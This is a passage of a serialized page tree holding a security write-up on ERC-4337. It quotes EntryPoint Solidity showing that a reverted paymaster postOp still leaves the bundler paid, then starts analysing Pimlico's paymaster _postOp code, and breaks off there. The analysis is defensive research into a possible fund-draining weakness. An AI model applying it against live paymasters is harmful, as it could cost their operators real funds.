Exec.getReturnData(REVERT_REASON_MAX_LEN);\n revert PostOpReverted(reason);\n }\n }\n // Calculating a penalty for unused postOp gas\n // note that if postOp is reverted, the maximum penalty (10% of postOpGasLimit) is charged.\n uint256 postOpGasUsed = postOpPreGas - gasleft();\n postOpUnusedGasPenalty = _getUnusedGasPenalty(postOpGasUsed, mUserOp.paymasterPostOpGasLimit);\n }\n }\n [...]\n }\n",[113441],{"type":27,"tag":84,"props":113442,"children":113443},{"__ignoreMap":7},[113444,113459,113483,113502,113521,113533,113570,113577,113609,113626,113641,113657,113681,113706,113730,113752,113770,113787,113795,113813,113829,113862,113880,113887,113894,113902,113918,113950,113972,113979,113986,113993],{"type":27,"tag":207,"props":113445,"children":113446},{"class":209,"line":210},[113447,113451,113455],{"type":27,"tag":207,"props":113448,"children":113449},{"style":214},[113450],{"type":33,"value":97050},{"type":27,"tag":207,"props":113452,"children":113453},{"style":1335},[113454],{"type":33,"value":112637},{"type":27,"tag":207,"props":113456,"children":113457},{"style":238},[113458],{"type":33,"value":9090},{"type":27,"tag":207,"props":113460,"children":113461},{"class":209,"line":244},[113462,113467,113471,113475,113479],{"type":27,"tag":207,"props":113463,"children":113464},{"style":214},[113465],{"type":33,"value":113466}," IPaymaster",{"type":27,"tag":207,"props":113468,"children":113469},{"style":238},[113470],{"type":33,"value":1041},{"type":27,"tag":207,"props":113472,"children":113473},{"style":220},[113474],{"type":33,"value":110999},{"type":27,"tag":207,"props":113476,"children":113477},{"style":220},[113478],{"type":33,"value":9343},{"type":27,"tag":207,"props":113480,"children":113481},{"style":238},[113482],{"type":33,"value":1842},{"type":27,"tag":207,"props":113484,"children":113485},{"class":209,"line":270},[113486,113490,113494,113498],{"type":27,"tag":207,"props":113487,"children":113488},{"style":214},[113489],{"type":33,"value":111945},{"type":27,"tag":207,"props":113491,"children":113492},{"style":214},[113493],{"type":33,"value":110287},{"type":27,"tag":207,"props":113495,"children":113496},{"style":220},[113497],{"type":33,"value":112933},{"type":27,"tag":207,"props":113499,"children":113500},{"style":238},[113501],{"type":33,"value":1842},{"type":27,"tag":207,"props":113503,"children":113504},{"class":209,"line":296},[113505,113509,113513,113517],{"type":27,"tag":207,"props":113506,"children":113507},{"style":8920},[113508],{"type":33,"value":112904},{"type":27,"tag":207,"props":113510,"children":113511},{"style":214},[113512],{"type":33,"value":110287},{"type":27,"tag":207,"props":113514,"children":113515},{"style":220},[113516],{"type":33,"value":83572},{"type":27,"tag":207,"props":113518,"children":113519},{"style":238},[113520],{"type":33,"value":1842},{"type":27,"tag":207,"props":113522,"children":113523},{"class":209,"line":445},[113524,113528],{"type":27,"tag":207,"props":113525,"children":113526},{"style":8920},[113527],{"type":33,"value":97227},{"type":27,"tag":207,"props":113529,"children":113530},{"style":220},[113531],{"type":33,"value":113532}," actualGas\n",{"type":27,"tag":207,"props":113534,"children":113535},{"class":209,"line":867},[113536,113540,113545,113550,113554,113558,113562,113566],{"type":27,"tag":207,"props":113537,"children":113538},{"style":238},[113539],{"type":33,"value":112961},{"type":27,"tag":207,"props":113541,"children":113542},{"style":214},[113543],{"type":33,"value":113544},"internal",{"type":27,"tag":207,"props":113546,"children":113547},{"style":214},[113548],{"type":33,"value":113549}," virtual",{"type":27,"tag":207,"props":113551,"children":113552},{"style":376},[113553],{"type":33,"value":83226},{"type":27,"tag":207,"props":113555,"children":113556},{"style":238},[113557],{"type":33,"value":686},{"type":27,"tag":207,"props":113559,"children":113560},{"style":8920},[113561],{"type":33,"value":53410},{"type":27,"tag":207,"props":113563,"children":113564},{"style":220},[113565],{"type":33,"value":111028},{"type":27,"tag":207,"props":113567,"children":113568},{"style":238},[113569],{"type":33,"value":1424},{"type":27,"tag":207,"props":113571,"children":113572},{"class":209,"line":892},[113573],{"type":27,"tag":207,"props":113574,"children":113575},{"style":238},[113576],{"type":33,"value":112006},{"type":27,"tag":207,"props":113578,"children":113579},{"class":209,"line":1475},[113580,113584,113589,113593,113597,113601,113605],{"type":27,"tag":207,"props":113581,"children":113582},{"style":376},[113583],{"type":33,"value":66034},{"type":27,"tag":207,"props":113585,"children":113586},{"style":238},[113587],{"type":33,"value":113588}," (paymaster ",{"type":27,"tag":207,"props":113590,"children":113591},{"style":226},[113592],{"type":33,"value":15856},{"type":27,"tag":207,"props":113594,"children":113595},{"style":8920},[113596],{"type":33,"value":13532},{"type":27,"tag":207,"props":113598,"children":113599},{"style":238},[113600],{"type":33,"value":1343},{"type":27,"tag":207,"props":113602,"children":113603},{"style":232},[113604],{"type":33,"value":1660},{"type":27,"tag":207,"props":113606,"children":113607},{"style":238},[113608],{"type":33,"value":8955},{"type":27,"tag":207,"props":113610,"children":113611},{"class":209,"line":2065},[113612,113617,113621],{"type":27,"tag":207,"props":113613,"children":113614},{"style":238},[113615],{"type":33,"value":113616}," refundAddress ",{"type":27,"tag":207,"props":113618,"children":113619},{"style":226},[113620],{"type":33,"value":10380},{"type":27,"tag":207,"props":113622,"children":113623},{"style":238},[113624],{"type":33,"value":113625}," mUserOp.sender;\n",{"type":27,"tag":207,"props":113627,"children":113628},{"class":209,"line":2092},[113629,113633,113637],{"type":27,"tag":207,"props":113630,"children":113631},{"style":238},[113632],{"type":33,"value":77827},{"type":27,"tag":207,"props":113634,"children":113635},{"style":376},[113636],{"type":33,"value":10605},{"type":27,"tag":207,"props":113638,"children":113639},{"style":238},[113640],{"type":33,"value":384},{"type":27,"tag":207,"props":113642,"children":113643},{"class":209,"line":2130},[113644,113648,113652],{"type":27,"tag":207,"props":113645,"children":113646},{"style":238},[113647],{"type":33,"value":113616},{"type":27,"tag":207,"props":113649,"children":113650},{"style":226},[113651],{"type":33,"value":10380},{"type":27,"tag":207,"props":113653,"children":113654},{"style":238},[113655],{"type":33,"value":113656}," paymaster;\n",{"type":27,"tag":207,"props":113658,"children":113659},{"class":209,"line":2168},[113660,113664,113669,113673,113677],{"type":27,"tag":207,"props":113661,"children":113662},{"style":376},[113663],{"type":33,"value":110727},{"type":27,"tag":207,"props":113665,"children":113666},{"style":238},[113667],{"type":33,"value":113668}," (context.length ",{"type":27,"tag":207,"props":113670,"children":113671},{"style":226},[113672],{"type":33,"value":17739},{"type":27,"tag":207,"props":113674,"children":113675},{"style":232},[113676],{"type":33,"value":4680},{"type":27,"tag":207,"props":113678,"children":113679},{"style":238},[113680],{"type":33,"value":1424},{"type":27,"tag":207,"props":113682,"children":113683},{"class":209,"line":4095},[113684,113689,113693,113697,113701],{"type":27,"tag":207,"props":113685,"children":113686},{"style":238},[113687],{"type":33,"value":113688}," actualGasCost ",{"type":27,"tag":207,"props":113690,"children":113691},{"style":226},[113692],{"type":33,"value":10380},{"type":27,"tag":207,"props":113694,"children":113695},{"style":238},[113696],{"type":33,"value":112497},{"type":27,"tag":207,"props":113698,"children":113699},{"style":226},[113700],{"type":33,"value":9286},{"type":27,"tag":207,"props":113702,"children":113703},{"style":238},[113704],{"type":33,"value":113705}," gasPrice;\n",{"type":27,"tag":207,"props":113707,"children":113708},{"class":209,"line":4103},[113709,113713,113718,113722,113726],{"type":27,"tag":207,"props":113710,"children":113711},{"style":8920},[113712],{"type":33,"value":110684},{"type":27,"tag":207,"props":113714,"children":113715},{"style":238},[113716],{"type":33,"value":113717}," postOpPreGas ",{"type":27,"tag":207,"props":113719,"children":113720},{"style":226},[113721],{"type":33,"value":10380},{"type":27,"tag":207,"props":113723,"children":113724},{"style":214},[113725],{"type":33,"value":112515},{"type":27,"tag":207,"props":113727,"children":113728},{"style":238},[113729],{"type":33,"value":4301},{"type":27,"tag":207,"props":113731,"children":113732},{"class":209,"line":4154},[113733,113738,113743,113747],{"type":27,"tag":207,"props":113734,"children":113735},{"style":376},[113736],{"type":33,"value":113737}," if",{"type":27,"tag":207,"props":113739,"children":113740},{"style":238},[113741],{"type":33,"value":113742}," (mode ",{"type":27,"tag":207,"props":113744,"children":113745},{"style":226},[113746],{"type":33,"value":22963},{"type":27,"tag":207,"props":113748,"children":113749},{"style":238},[113750],{"type":33,"value":113751}," IPaymaster.PostOpMode.postOpReverted) {\n",{"type":27,"tag":207,"props":113753,"children":113754},{"class":209,"line":4203},[113755,113760,113765],{"type":27,"tag":207,"props":113756,"children":113757},{"style":376},[113758],{"type":33,"value":113759}," try",{"type":27,"tag":207,"props":113761,"children":113762},{"style":1335},[113763],{"type":33,"value":113764}," IPaymaster",{"type":27,"tag":207,"props":113766,"children":113767},{"style":238},[113768],{"type":33,"value":113769},"(paymaster).postOp{\n",{"type":27,"tag":207,"props":113771,"children":113772},{"class":209,"line":4249},[113773,113778,113782],{"type":27,"tag":207,"props":113774,"children":113775},{"style":238},[113776],{"type":33,"value":113777}," gas",{"type":27,"tag":207,"props":113779,"children":113780},{"style":226},[113781],{"type":33,"value":736},{"type":27,"tag":207,"props":113783,"children":113784},{"style":238},[113785],{"type":33,"value":113786}," mUserOp.paymasterPostOpGasLimit\n",{"type":27,"tag":207,"props":113788,"children":113789},{"class":209,"line":4290},[113790],{"type":27,"tag":207,"props":113791,"children":113792},{"style":238},[113793],{"type":33,"value":113794}," }(mode, context, actualGasCost, gasPrice)\n",{"type":27,"tag":207,"props":113796,"children":113797},{"class":209,"line":4304},[113798,113803,113808],{"type":27,"tag":207,"props":113799,"children":113800},{"style":4647},[113801],{"type":33,"value":113802}," // ",{"type":27,"tag":207,"props":113804,"children":113805},{"style":214},[113806],{"type":33,"value":113807},"solhint-disable",{"type":27,"tag":207,"props":113809,"children":113810},{"style":4647},[113811],{"type":33,"value":113812},"-next-line no-empty-blocks\n",{"type":27,"tag":207,"props":113814,"children":113815},{"class":209,"line":5466},[113816,113821,113825],{"type":27,"tag":207,"props":113817,"children":113818},{"style":238},[113819],{"type":33,"value":113820}," {} ",{"type":27,"tag":207,"props":113822,"children":113823},{"style":376},[113824],{"type":33,"value":413},{"type":27,"tag":207,"props":113826,"children":113827},{"style":238},[113828],{"type":33,"value":384},{"type":27,"tag":207,"props":113830,"children":113831},{"class":209,"line":5530},[113832,113837,113841,113846,113850,113854,113858],{"type":27,"tag":207,"props":113833,"children":113834},{"style":8920},[113835],{"type":33,"value":113836}," bytes",{"type":27,"tag":207,"props":113838,"children":113839},{"style":214},[113840],{"type":33,"value":110287},{"type":27,"tag":207,"props":113842,"children":113843},{"style":238},[113844],{"type":33,"value":113845}," reason ",{"type":27,"tag":207,"props":113847,"children":113848},{"style":226},[113849],{"type":33,"value":10380},{"type":27,"tag":207,"props":113851,"children":113852},{"style":238},[113853],{"type":33,"value":113056},{"type":27,"tag":207,"props":113855,"children":113856},{"style":1335},[113857],{"type":33,"value":113147},{"type":27,"tag":207,"props":113859,"children":113860},{"style":238},[113861],{"type":33,"value":113152},{"type":27,"tag":207,"props":113863,"children":113864},{"class":209,"line":7900},[113865,113870,113875],{"type":27,"tag":207,"props":113866,"children":113867},{"style":376},[113868],{"type":33,"value":113869}," revert",{"type":27,"tag":207,"props":113871,"children":113872},{"style":1335},[113873],{"type":33,"value":113874}," PostOpReverted",{"type":27,"tag":207,"props":113876,"children":113877},{"style":238},[113878],{"type":33,"value":113879},"(reason);\n",{"type":27,"tag":207,"props":113881,"children":113882},{"class":209,"line":7909},[113883],{"type":27,"tag":207,"props":113884,"children":113885},{"style":238},[113886],{"type":33,"value":78211},{"type":27,"tag":207,"props":113888,"children":113889},{"class":209,"line":7917},[113890],{"type":27,"tag":207,"props":113891,"children":113892},{"style":238},[113893],{"type":33,"value":78296},{"type":27,"tag":207,"props":113895,"children":113896},{"class":209,"line":7926},[113897],{"type":27,"tag":207,"props":113898,"children":113899},{"style":4647},[113900],{"type":33,"value":113901}," // Calculating a penalty for unused postOp gas\n",{"type":27,"tag":207,"props":113903,"children":113904},{"class":209,"line":7934},[113905,113909,113913],{"type":27,"tag":207,"props":113906,"children":113907},{"style":4647},[113908],{"type":33,"value":110749},{"type":27,"tag":207,"props":113910,"children":113911},{"style":214},[113912],{"type":33,"value":73992},{"type":27,"tag":207,"props":113914,"children":113915},{"style":4647},[113916],{"type":33,"value":113917}," that if postOp is reverted, the maximum penalty (10% of postOpGasLimit) is charged.\n",{"type":27,"tag":207,"props":113919,"children":113920},{"class":209,"line":7943},[113921,113925,113930,113934,113938,113942,113946],{"type":27,"tag":207,"props":113922,"children":113923},{"style":8920},[113924],{"type":33,"value":110684},{"type":27,"tag":207,"props":113926,"children":113927},{"style":238},[113928],{"type":33,"value":113929}," postOpGasUsed ",{"type":27,"tag":207,"props":113931,"children":113932},{"style":226},[113933],{"type":33,"value":10380},{"type":27,"tag":207,"props":113935,"children":113936},{"style":238},[113937],{"type":33,"value":113717},{"type":27,"tag":207,"props":113939,"children":113940},{"style":226},[113941],{"type":33,"value":11611},{"type":27,"tag":207,"props":113943,"children":113944},{"style":214},[113945],{"type":33,"value":112515},{"type":27,"tag":207,"props":113947,"children":113948},{"style":238},[113949],{"type":33,"value":4301},{"type":27,"tag":207,"props":113951,"children":113952},{"class":209,"line":7952},[113953,113958,113962,113967],{"type":27,"tag":207,"props":113954,"children":113955},{"style":238},[113956],{"type":33,"value":113957}," postOpUnusedGasPenalty ",{"type":27,"tag":207,"props":113959,"children":113960},{"style":226},[113961],{"type":33,"value":10380},{"type":27,"tag":207,"props":113963,"children":113964},{"style":1335},[113965],{"type":33,"value":113966}," _getUnusedGasPenalty",{"type":27,"tag":207,"props":113968,"children":113969},{"style":238},[113970],{"type":33,"value":113971},"(postOpGasUsed, mUserOp.paymasterPostOpGasLimit);\n",{"type":27,"tag":207,"props":113973,"children":113974},{"class":209,"line":7961},[113975],{"type":27,"tag":207,"props":113976,"children":113977},{"style":238},[113978],{"type":33,"value":78304},{"type":27,"tag":207,"props":113980,"children":113981},{"class":209,"line":7969},[113982],{"type":27,"tag":207,"props":113983,"children":113984},{"style":238},[113985],{"type":33,"value":66118},{"type":27,"tag":207,"props":113987,"children":113988},{"class":209,"line":7978},[113989],{"type":27,"tag":207,"props":113990,"children":113991},{"style":238},[113992],{"type":33,"value":112006},{"type":27,"tag":207,"props":113994,"children":113995},{"class":209,"line":7987},[113996],{"type":27,"tag":207,"props":113997,"children":113998},{"style":238},[113999],{"type":33,"value":10645},{"type":27,"tag":36,"props":114001,"children":114002},{},[114003,114005,114010,114012,114018,114020,114026,114028,114033,114035,114040,114042,114047,114049,114054,114056,114061,114063,114068],{"type":33,"value":114004},"It turns out that if the ",{"type":27,"tag":84,"props":114006,"children":114008},{"className":114007},[],[114009],{"type":33,"value":109588},{"type":33,"value":114011}," call fails, it will revert with ",{"type":27,"tag":84,"props":114013,"children":114015},{"className":114014},[],[114016],{"type":33,"value":114017},"PostOpReverted",{"type":33,"value":114019},". However, as we can see in the previous code of ",{"type":27,"tag":84,"props":114021,"children":114023},{"className":114022},[],[114024],{"type":33,"value":114025},"_executeUserOp",{"type":33,"value":114027},", even though ",{"type":27,"tag":84,"props":114029,"children":114031},{"className":114030},[],[114032],{"type":33,"value":112728},{"type":33,"value":114034}," fails, the execution won't revert. Instead, it will continue to make another ",{"type":27,"tag":84,"props":114036,"children":114038},{"className":114037},[],[114039],{"type":33,"value":113396},{"type":33,"value":114041}," call with ",{"type":27,"tag":84,"props":114043,"children":114045},{"className":114044},[],[114046],{"type":33,"value":113404},{"type":33,"value":114048}," mode, and it won't try to call ",{"type":27,"tag":84,"props":114050,"children":114052},{"className":114051},[],[114053],{"type":33,"value":109588},{"type":33,"value":114055}," again. This means the ",{"type":27,"tag":84,"props":114057,"children":114059},{"className":114058},[],[114060],{"type":33,"value":109449},{"type":33,"value":114062}," still gets paid for submitting the failed ",{"type":27,"tag":84,"props":114064,"children":114066},{"className":114065},[],[114067],{"type":33,"value":109389},{"type":33,"value":1041},{"type":27,"tag":36,"props":114070,"children":114071},{},[114072,114074,114079,114081,114086,114088,114095],{"type":33,"value":114073},"Now that we understand this behavior where ",{"type":27,"tag":84,"props":114075,"children":114077},{"className":114076},[],[114078],{"type":33,"value":109588},{"type":33,"value":114080}," is allowed to fail while the ",{"type":27,"tag":84,"props":114082,"children":114084},{"className":114083},[],[114085],{"type":33,"value":109449},{"type":33,"value":114087}," still gets paid, let's examine a real-world example from the most widely used paymaster currently, which is the paymaster implemented by ",{"type":27,"tag":47,"props":114089,"children":114092},{"href":114090,"rel":114091},"https://github.com/pimlicolabs/singleton-paymaster/blob/feat/v8/src/SingletonPaymasterV7.sol",[51],[114093],{"type":33,"value":114094},"Pimlico",{"type":33,"value":1041},{"type":27,"tag":101,"props":114097,"children":114099},{"className":11758,"code":114098,"language":11757,"meta":7,"style":7}," function _postOp(\n PostOpMode, /* mode */\n bytes calldata _context,\n uint256 _actualGasCost,\n uint256 _actualUserOpFeePerGas\n )\n internal\n {\n ERC20PostOpContext memory ctx = _parsePostOpContext(_context);\n\n uint256 expectedPenaltyGasCost = _expectedPenaltyGasCost(\n _actualGasCost, _actualUserOpFeePerGas, ctx.postOpGas, ctx.preOpGasApproximation, ctx.executionGasLimit\n );\n\n uint256 actualGasCost = _actualGasCost + expectedPenaltyGasCost;\n\n uint256 costInToken =\n getCostInToken(actualGasCost, ctx.postOpGas, _actualUserOpFeePerGas, ctx.exchangeRate) + ctx.constantFee;\n\n uint256 absoluteCostInToken =\n costInToken > ctx.preFundCharged ? costInToken - ctx.preFundCharged : ctx.preFundCharged - costInToken;\n\n SafeTransferLib.safeTransferFrom(\n ctx.token,\n costInToken > ctx.preFundCharged ? ctx.sender : ctx.treasury,\n costInToken > ctx.preFundCharged ? ctx.treasury : ctx.sender,\n absoluteCostInToken\n );\n\n uint256 preFundInToken = (ctx.preFund * ctx.exchangeRate) / 1e18;\n\n if (ctx.recipient != address(0) && preFundInToken > costInToken) {\n SafeTransferLib.safeTransferFrom(ctx.token, ctx.sender, ctx.recipient, preFundInToken - costInToken);\n }\n\n emit UserOperationSponsored(ctx.userOpHash, ctx.sender, ERC20_MODE, ctx.token, costInToken, ctx.exchangeRate);\n }\n",[114100],{"type":27,"tag":84,"props":114101,"children":114102},{"__ignoreMap":7},[114103,114118,114135,114155,114171,114183,114190,114197,114204,114235,114242,114267,114275,114282,114289,114318,114325,114341,114363,114370,114386,114436,114443,114459,114467,114500,114533,114541,114548,114555,114598,114605,114654,114680,114687,114694,114711],{"type":27,"tag":207,"props":114104,"children":114105},{"class":209,"line":210},[114106,114110,114114],{"type":27,"tag":207,"props":114107,"children":114108},{"style":214},[114109],{"type":33,"value":97050},{"type":27,"tag":207,"props":114111,"children":114112},{"style":1335},[114113],{"type":33,"value":110990},{"type":27,"tag":207,"props":114115,"children":114116},{"style":238},[114117],{"type":33,"value":9090},{"type":27,"tag":207,"props":114119,"children":114120},{"class":209,"line":244},[114121,114126,114130],{"type":27,"tag":207,"props":114122,"children":114123},{"style":214},[114124],{"type":33,"value":114125}," PostOpMode",{"type":27,"tag":207,"props":114127,"children":114128},{"style":238},[114129],{"type":33,"value":1123},{"type":27,"tag":207,"props":114131,"children":114132},{"style":4647},[114133],{"type":33,"value":114134},"/* mode */\n",{"type":27,"tag":207,"props":114136,"children":114137},{"class":209,"line":270},[114138,114142,114146,114151],{"type":27,"tag":207,"props":114139,"children":114140},{"style":8920},[114141],{"type":33,"value":112904},{"type":27,"tag":207,"props":114143,"children":114144},{"style":214},[114145],{"type":33,"value":110219},{"type":27,"tag":207,"props":114147,"children":114148},{"style":220},[114149],{"type":33,"value":114150}," _context",{"type":27,"tag":207,"props":114152,"children":114153},{"style":238},[114154],{"type":33,"value":1842},{"type":27,"tag":207,"props":114156,"children":114157},{"class":209,"line":296},[114158,114162,114167],{"type":27,"tag":207,"props":114159,"children":114160},{"style":8920},[114161],{"type":33,"value":97227},{"type":27,"tag":207,"props":114163,"children":114164},{"style":220},[114165],{"type":33,"value":114166}," _actualGasCost",{"type":27,"tag":207,"props":114168,"children":114169},{"style":238},[114170],{"type":33,"value":1842},{"type":27,"tag":207,"props":114172,"children":114173},{"class":209,"line":445},[114174,114178],{"type":27,"tag":207,"props":114175,"children":114176},{"style":8920},[114177],{"type":33,"value":97227},{"type":27,"tag":207,"props":114179,"children":114180},{"style":220},[114181],{"type":33,"value":114182}," _actualUserOpFeePerGas\n",{"type":27,"tag":207,"props":114184,"children":114185},{"class":209,"line":867},[114186],{"type":27,"tag":207,"props":114187,"children":114188},{"style":238},[114189],{"type":33,"value":31184},{"type":27,"tag":207,"props":114191,"children":114192},{"class":209,"line":892},[114193],{"type":27,"tag":207,"props":114194,"children":114195},{"style":214},[114196],{"type":33,"value":110258},{"type":27,"tag":207,"props":114198,"children":114199},{"class":209,"line":1475},[114200],{"type":27,"tag":207,"props":114201,"children":114202},{"style":238},[114203],{"type":33,"value":36449},{"type":27,"tag":207,"props":114205,"children":114206},{"class":209,"line":2065},[114207,114212,114216,114221,114225,114230],{"type":27,"tag":207,"props":114208,"children":114209},{"style":238},[114210],{"type":33,"value":114211}," ERC20PostOpContext ",{"type":27,"tag":207,"props":114213,"children":114214},{"style":214},[114215],{"type":33,"value":83205},{"type":27,"tag":207,"props":114217,"children":114218},{"style":238},[114219],{"type":33,"value":114220}," ctx ",{"type":27,"tag":207,"props":114222,"children":114223},{"style":226},[114224],{"type":33,"value":10380},{"type":27,"tag":207,"props":114226,"children":114227},{"style":1335},[114228],{"type":33,"value":114229}," _parsePostOpContext",{"type":27,"tag":207,"props":114231,"children":114232},{"style":238},[114233],{"type":33,"value":114234},"(_context);\n",{"type":27,"tag":207,"props":114236,"children":114237},{"class":209,"line":2092},[114238],{"type":27,"tag":207,"props":114239,"children":114240},{"emptyLinePlaceholder":19},[114241],{"type":33,"value":2062},{"type":27,"tag":207,"props":114243,"children":114244},{"class":209,"line":2130},[114245,114249,114254,114258,114263],{"type":27,"tag":207,"props":114246,"children":114247},{"style":8920},[114248],{"type":33,"value":97227},{"type":27,"tag":207,"props":114250,"children":114251},{"style":238},[114252],{"type":33,"value":114253}," expectedPenaltyGasCost ",{"type":27,"tag":207,"props":114255,"children":114256},{"style":226},[114257],{"type":33,"value":10380},{"type":27,"tag":207,"props":114259,"children":114260},{"style":1335},[114261],{"type":33,"value":114262}," _expectedPenaltyGasCost",{"type":27,"tag":207,"props":114264,"children":114265},{"style":238},[114266],{"type":33,"value":9090},{"type":27,"tag":207,"props":114268,"children":114269},{"class":209,"line":2168},[114270],{"type":27,"tag":207,"props":114271,"children":114272},{"style":238},[114273],{"type":33,"value":114274}," _actualGasCost, _actualUserOpFeePerGas, ctx.postOpGas, ctx.preOpGasApproximation, ctx.executionGasLimit\n",{"type":27,"tag":207,"props":114276,"children":114277},{"class":209,"line":4095},[114278],{"type":27,"tag":207,"props":114279,"children":114280},{"style":238},[114281],{"type":33,"value":15026},{"type":27,"tag":207,"props":114283,"children":114284},{"class":209,"line":4103},[114285],{"type":27,"tag":207,"props":114286,"children":114287},{"emptyLinePlaceholder":19},[114288],{"type":33,"value":2062},{"type":27,"tag":207,"props":114290,"children":114291},{"class":209,"line":4154},[114292,114296,114300,114304,114309,114313],{"type":27,"tag":207,"props":114293,"children":114294},{"style":8920},[114295],{"type":33,"value":97227},{"type":27,"tag":207,"props":114297,"children":114298},{"style":238},[114299],{"type":33,"value":111314},{"type":27,"tag":207,"props":114301,"children":114302},{"style":226},[114303],{"type":33,"value":10380},{"type":27,"tag":207,"props":114305,"children":114306},{"style":238},[114307],{"type":33,"value":114308}," _actualGasCost ",{"type":27,"tag":207,"props":114310,"children":114311},{"style":226},[114312],{"type":33,"value":2227},{"type":27,"tag":207,"props":114314,"children":114315},{"style":238},[114316],{"type":33,"value":114317}," expectedPenaltyGasCost;\n",{"type":27,"tag":207,"props":114319,"children":114320},{"class":209,"line":4203},[114321],{"type":27,"tag":207,"props":114322,"children":114323},{"emptyLinePlaceholder":19},[114324],{"type":33,"value":2062},{"type":27,"tag":207,"props":114326,"children":114327},{"class":209,"line":4249},[114328,114332,114337],{"type":27,"tag":207,"props":114329,"children":114330},{"style":8920},[114331],{"type":33,"value":97227},{"type":27,"tag":207,"props":114333,"children":114334},{"style":238},[114335],{"type":33,"value":114336}," costInToken ",{"type":27,"tag":207,"props":114338,"children":114339},{"style":226},[114340],{"type":33,"value":21969},{"type":27,"tag":207,"props":114342,"children":114343},{"class":209,"line":4290},[114344,114349,114354,114358],{"type":27,"tag":207,"props":114345,"children":114346},{"style":1335},[114347],{"type":33,"value":114348}," getCostInToken",{"type":27,"tag":207,"props":114350,"children":114351},{"style":238},[114352],{"type":33,"value":114353},"(actualGasCost, ctx.postOpGas, _actualUserOpFeePerGas, ctx.exchangeRate) ",{"type":27,"tag":207,"props":114355,"children":114356},{"style":226},[114357],{"type":33,"value":2227},{"type":27,"tag":207,"props":114359,"children":114360},{"style":238},[114361],{"type":33,"value":114362}," ctx.constantFee;\n",{"type":27,"tag":207,"props":114364,"children":114365},{"class":209,"line":4304},[114366],{"type":27,"tag":207,"props":114367,"children":114368},{"emptyLinePlaceholder":19},[114369],{"type":33,"value":2062},{"type":27,"tag":207,"props":114371,"children":114372},{"class":209,"line":5466},[114373,114377,114382],{"type":27,"tag":207,"props":114374,"children":114375},{"style":8920},[114376],{"type":33,"value":97227},{"type":27,"tag":207,"props":114378,"children":114379},{"style":238},[114380],{"type":33,"value":114381}," absoluteCostInToken ",{"type":27,"tag":207,"props":114383,"children":114384},{"style":226},[114385],{"type":33,"value":21969},{"type":27,"tag":207,"props":114387,"children":114388},{"class":209,"line":5530},[114389,114394,114398,114403,114407,114411,114415,114419,114423,114427,114431],{"type":27,"tag":207,"props":114390,"children":114391},{"style":238},[114392],{"type":33,"value":114393}," costInToken ",{"type":27,"tag":207,"props":114395,"children":114396},{"style":226},[114397],{"type":33,"value":17739},{"type":27,"tag":207,"props":114399,"children":114400},{"style":238},[114401],{"type":33,"value":114402}," ctx.preFundCharged ",{"type":27,"tag":207,"props":114404,"children":114405},{"style":226},[114406],{"type":33,"value":10444},{"type":27,"tag":207,"props":114408,"children":114409},{"style":238},[114410],{"type":33,"value":114336},{"type":27,"tag":207,"props":114412,"children":114413},{"style":226},[114414],{"type":33,"value":11611},{"type":27,"tag":207,"props":114416,"children":114417},{"style":238},[114418],{"type":33,"value":114402},{"type":27,"tag":207,"props":114420,"children":114421},{"style":226},[114422],{"type":33,"value":736},{"type":27,"tag":207,"props":114424,"children":114425},{"style":238},[114426],{"type":33,"value":114402},{"type":27,"tag":207,"props":114428,"children":114429},{"style":226},[114430],{"type":33,"value":11611},{"type":27,"tag":207,"props":114432,"children":114433},{"style":238},[114434],{"type":33,"value":114435}," costInToken;\n",{"type":27,"tag":207,"props":114437,"children":114438},{"class":209,"line":7900},[114439],{"type":27,"tag":207,"props":114440,"children":114441},{"emptyLinePlaceholder":19},[114442],{"type":33,"value":2062},{"type":27,"tag":207,"props":114444,"children":114445},{"class":209,"line":7909},[114446,114451,114455],{"type":27,"tag":207,"props":114447,"children":114448},{"style":238},[114449],{"type":33,"value":114450}," SafeTransferLib.",{"type":27,"tag":207,"props":114452,"children":114453},{"style":1335},[114454],{"type":33,"value":110845},{"type":27,"tag":207,"props":114456,"children":114457},{"style":238},[114458],{"type":33,"value":9090},{"type":27,"tag":207,"props":114460,"children":114461},{"class":209,"line":7917},[114462],{"type":27,"tag":207,"props":114463,"children":114464},{"style":238},[114465],{"type":33,"value":114466}," ctx.token,\n",{"type":27,"tag":207,"props":114468,"children":114469},{"class":209,"line":7926},[114470,114474,114478,114482,114486,114491,114495],{"type":27,"tag":207,"props":114471,"children":114472},{"style":238},[114473],{"type":33,"value":114393},{"type":27,"tag":207,"props":114475,"children":114476},{"style":226},[114477],{"type":33,"value":17739},{"type":27,"tag":207,"props":114479,"children":114480},{"style":238},[114481],{"type":33,"value":114402},{"type":27,"tag":207,"props":114483,"children":114484},{"style":226},[114485],{"type":33,"value":10444},{"type":27,"tag":207,"props":114487,"children":114488},{"style":238},[114489],{"type":33,"value":114490}," ctx.sender ",{"type":27,"tag":207,"props":114492,"children":114493},{"style":226},[114494],{"type":33,"value":736},{"type":27,"tag":207,"props":114496,"children":114497},{"style":238},[114498],{"type":33,"value":114499}," ctx.treasury,\n",{"type":27,"tag":207,"props":114501,"children":114502},{"class":209,"line":7934},[114503,114507,114511,114515,114519,114524,114528],{"type":27,"tag":207,"props":114504,"children":114505},{"style":238},[114506],{"type":33,"value":114393},{"type":27,"tag":207,"props":114508,"children":114509},{"style":226},[114510],{"type":33,"value":17739},{"type":27,"tag":207,"props":114512,"children":114513},{"style":238},[114514],{"type":33,"value":114402},{"type":27,"tag":207,"props":114516,"children":114517},{"style":226},[114518],{"type":33,"value":10444},{"type":27,"tag":207,"props":114520,"children":114521},{"style":238},[114522],{"type":33,"value":114523}," ctx.treasury ",{"type":27,"tag":207,"props":114525,"children":114526},{"style":226},[114527],{"type":33,"value":736},{"type":27,"tag":207,"props":114529,"children":114530},{"style":238},[114531],{"type":33,"value":114532}," ctx.sender,\n",{"type":27,"tag":207,"props":114534,"children":114535},{"class":209,"line":7943},[114536],{"type":27,"tag":207,"props":114537,"children":114538},{"style":238},[114539],{"type":33,"value":114540}," absoluteCostInToken\n",{"type":27,"tag":207,"props":114542,"children":114543},{"class":209,"line":7952},[114544],{"type":27,"tag":207,"props":114545,"children":114546},{"style":238},[114547],{"type":33,"value":15026},{"type":27,"tag":207,"props":114549,"children":114550},{"class":209,"line":7961},[114551],{"type":27,"tag":207,"props":114552,"children":114553},{"emptyLinePlaceholder":19},[114554],{"type":33,"value":2062},{"type":27,"tag":207,"props":114556,"children":114557},{"class":209,"line":7969},[114558,114562,114567,114571,114576,114580,114585,114589,114594],{"type":27,"tag":207,"props":114559,"children":114560},{"style":8920},[114561],{"type":33,"value":97227},{"type":27,"tag":207,"props":114563,"children":114564},{"style":238},[114565],{"type":33,"value":114566}," preFundInToken 